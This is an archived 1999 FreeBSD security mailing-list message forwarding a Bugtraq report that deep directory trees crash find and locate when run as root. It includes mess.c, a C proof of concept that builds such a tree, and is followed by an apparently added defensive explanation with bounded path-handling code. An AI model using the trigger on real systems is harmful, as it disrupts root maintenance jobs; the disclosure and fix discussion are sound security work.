From owner-freebsd-security Tue May  4 14:29:38 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ifi.uio.no (ifi.uio.no [129.240.64.2]) by hub.freebsd.org (Postfix) with ESMTP id 9225114DE7 for ; Tue, 4 May 1999 14:29:22 -0700 (PDT) (envelope-from des@ifi.uio.no)
Received: from hrotti.ifi.uio.no (2602@hrotti.ifi.uio.no [129.240.64.15]) by ifi.uio.no (8.8.8/8.8.7/ifi0.2) with ESMTP id XAA08417 for ; Tue, 4 May 1999 23:29:21 +0200 (MET DST)
Received: (from des@localhost) by hrotti.ifi.uio.no ; Tue, 4 May 1999 23:29:20 +0200 (MET DST)
To: security@freebsd.org
Subject: [Przemyslaw Frasunek ] Re: Buffer overflow in ftpd and locate bug
From: Dag-Erling Smorgrav
Date: 04 May 1999 23:29:17 +0200
Message-ID:
Lines: 92
X-Mailer: Gnus v5.5/Emacs 19.34
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

------- Start of forwarded message -------
Message-ID: <19990502183800.1113.qmail@venglin.gadaczka.org>
Date: Sun, 2 May 1999 20:37:35 CEST
Reply-To: Przemyslaw Frasunek
From: Przemyslaw Frasunek
Subject: Re: Buffer overflow in ftpd and locate bug
To: BUGTRAQ@NETSPACE.ORG

> I had a problem with locate from findutils-4.1.24.rpm from Redhat-5.1.
> It segfaults if we have a huge directory at incoming ftp which was created
> by exploits for the ftpd realpath hole. My ftpd is patched. Those exploits,
> I think, should not worry me, but if updatedb puts that directory into the
> locate database then locate segfaults. (getline.c row 104 by gdb)
> I guess it can be used for running arbitrary commands if root runs locate.

I've noticed a similar problem with /usr/bin/find on FreeBSD. By creating a
_very_ long and deep directory structure it's possible to segfault
/usr/bin/find (it's also used in the /etc/periodic scripts, which run as
root).
Example: I'm creating a directory structure with 300 subdirectories, each
255 chars in length (source in the attachment; it's also possible to do it
via ftpd, because it calls mkdir() and chdir()).

lagoon:venglin:/tmp/jc> find example > /dev/null
Segmentation fault (core dumped)

Gdb shows that the function puts() was overflowed when it tried to print a
very long path. Other system tools (rm, ls) also have big problems with such
directory structures.

--
* Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 *
* Inet: venglin@lagoon.freebsd.org.pl ** PGP:D48684904685DF43EA93AFA13BE170BF *

[Attachment: mess.c, 2 May 1999, 748 bytes]
mess.c:

    #include <errno.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/stat.h>

    /* Fill byte for every directory name ('A'). */
    #define DUMP 0x41

    /*
     * Starting in argv[1], create and enter one 255-character directory per
     * iteration until argv[2]-1 levels exist.  The resulting full path is far
     * longer than MAXPATHLEN, which is what trips find(1) and friends.
     */
    int
    main(int argc, char *argv[])
    {
    	char buf[256];		/* 255 name bytes plus the terminating NUL */
    	int i = 0;

    	/* Argument names in the usage line were lost in extraction. */
    	if (argc < 3) {
    		fprintf(stderr, "usage: %s <directory> <depth>\n", argv[0]);
    		exit(1);
    	}
    	if (chdir(argv[1])) {
    		fprintf(stderr, "error in chdir(): %s\n", strerror(errno));
    		exit(1);
    	}
    	memset(buf, DUMP, 255);
    	buf[255] = '\0';	/* the posted code left the name unterminated */
    	for (i = 0; i < (atoi(argv[2])) - 1; i++) {
    		if (mkdir(buf, (S_IRWXU | S_IRWXG | S_IRWXO))) {
    			fprintf(stderr, "error in mkdir() after %d iterations: %s\n",
    			    i, strerror(errno));
    			exit(1);
    		}
    		if (chdir(buf)) {
    			fprintf(stderr, "error in chdir() after %d iterations: %s\n",
    			    i, strerror(errno));
    			exit(1);
    		}
    	}
    	exit(0);
    }

------- End of forwarded message -------

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
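The bug class behind the crash above is a directory walker that assembles the full path of each entry in a fixed MAXPATHLEN-sized buffer while it descends, with no check that the next component still fits. The following is an added example, not code from the post or from FreeBSD's find(1): it models the same tree mess.c builds (300 components of 255 'A's) purely in memory, so it runs without touching the filesystem, and contrasts a bound-checked join that fails closed with ENAMETOOLONG against a growing buffer that has no fixed limit. The names join_bounded, pathbuf, bounded_depth_reached and growing_path_length are my own, and BSD_MAXPATHLEN is set to 1024 to match the historical BSD value.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Historical BSD MAXPATHLEN; the fixed buffers in 1999-era tools were this size. */
#define BSD_MAXPATHLEN 1024

/*
 * Fixed-buffer join with a bound check.  Appends "/name" to the
 * NUL-terminated string in path (a buffer of pathsz bytes).  Returns 0,
 * or -1 with errno = ENAMETOOLONG instead of writing past the end.
 * The unchecked form of this (strcat into a MAXPATHLEN array) is exactly
 * what a deep tree of 255-byte names overflows.
 */
int join_bounded(char *path, size_t pathsz, const char *name)
{
    size_t plen = strlen(path), nlen = strlen(name);
    size_t need = plen + (plen ? 1 : 0) + nlen + 1;   /* "/" + name + NUL */

    if (need > pathsz) {
        errno = ENAMETOOLONG;
        return -1;
    }
    if (plen)
        path[plen++] = '/';
    memcpy(path + plen, name, nlen + 1);
    return 0;
}

/* Growing path buffer: length is bounded only by available memory. */
struct pathbuf {
    char *p;
    size_t len, cap;
};

int pathbuf_push(struct pathbuf *pb, const char *name)
{
    size_t nlen = strlen(name);
    size_t need = pb->len + (pb->len ? 1 : 0) + nlen + 1;

    if (need > pb->cap) {
        size_t ncap = pb->cap ? pb->cap : 256;
        while (ncap < need)
            ncap *= 2;
        char *np = realloc(pb->p, ncap);
        if (np == NULL)
            return -1;
        pb->p = np;
        pb->cap = ncap;
    }
    if (pb->len)
        pb->p[pb->len++] = '/';
    memcpy(pb->p + pb->len, name, nlen + 1);
    pb->len += nlen;
    return 0;
}

/* Constructed input: one component of namelen 'A's, as mess.c creates. */
static char *make_name(int namelen)
{
    char *name = malloc(namelen + 1);
    if (name == NULL)
        abort();
    memset(name, 'A', namelen);
    name[namelen] = '\0';
    return name;
}

/* Walk 'depth' components through the bounded join; returns how many
 * were accepted before ENAMETOOLONG (depth itself if all fit). */
int bounded_depth_reached(int depth, int namelen)
{
    char path[BSD_MAXPATHLEN];
    char *name = make_name(namelen);
    int i;

    path[0] = '\0';
    for (i = 0; i < depth; i++)
        if (join_bounded(path, sizeof path, name) != 0)
            break;
    free(name);
    return i;
}

/* Same walk through the growing buffer; returns the final path length. */
size_t growing_path_length(int depth, int namelen)
{
    struct pathbuf pb = { NULL, 0, 0 };
    char *name = make_name(namelen);
    size_t len;

    for (int i = 0; i < depth; i++)
        if (pathbuf_push(&pb, name) != 0)
            break;
    len = pb.len;
    free(pb.p);
    free(name);
    return len;
}

int main(void)
{
    printf("bounded join accepts %d of 300 components before ENAMETOOLONG\n",
           bounded_depth_reached(300, 255));
    printf("growing buffer holds the full %zu-byte path\n",
           growing_path_length(300, 255));
    return 0;
}
```

With 255-byte names and a 1024-byte buffer the bounded join stops after four components (255*4 + 3 separators + NUL = 1024), which is the point at which an unchecked strcat would start writing past the array; the growing buffer ends up holding a 76799-byte path. The practical lesson for anything that runs from /etc/periodic as root over an anonymous-FTP incoming directory is that every fixed path buffer must either refuse over-long paths or be replaced by one that grows, since the attacker controls the depth and the name lengths.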